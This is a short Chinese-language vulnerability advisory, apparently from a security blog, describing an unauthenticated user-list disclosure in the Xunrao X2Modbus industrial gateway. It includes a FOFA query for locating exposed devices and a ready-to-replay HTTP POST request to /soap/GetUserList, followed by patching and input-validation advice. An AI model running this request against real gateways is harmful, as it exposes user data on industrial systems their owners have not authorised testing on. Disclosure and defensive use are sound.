迅饶科技X2Modbus网关-GetUser信息泄露漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

该漏洞的存在是由于'GetUser'接口在处理SOAP请求时,缺乏对请求的充分验证和授权检查,任何人都可以通过发送特定的SOAP请求,获取系统中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP请求,绕过身份验证机制,直接获取用户数据。

漏洞再现

FOFA:server="SunFull-Webs"

http://ip:898/login.html页面抓包,在重放器使用下面的格式

POST /soap/GetUserList

HTTP/1.1 ip

Cookie: language=zh-cn; language=zh-cn; username=admin

Content-Length: 12

Connection: close

{"CmpWc":""}

修复建议

对 GetUser 接口的输入进行严格的验证和过滤。确保输入的用户名和密码符合预期的格式和长度,防止恶意用户通过构造特殊字符或语句来获取信息。

定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并及时应用到系统中。厂商通常会修复已知的漏洞,通过更新补丁可以有效地防止攻击者利用这些漏洞进行信息泄露攻击。

相关推荐
用户962377954481 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954485 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行9 天前
网络安全总结
安全·web安全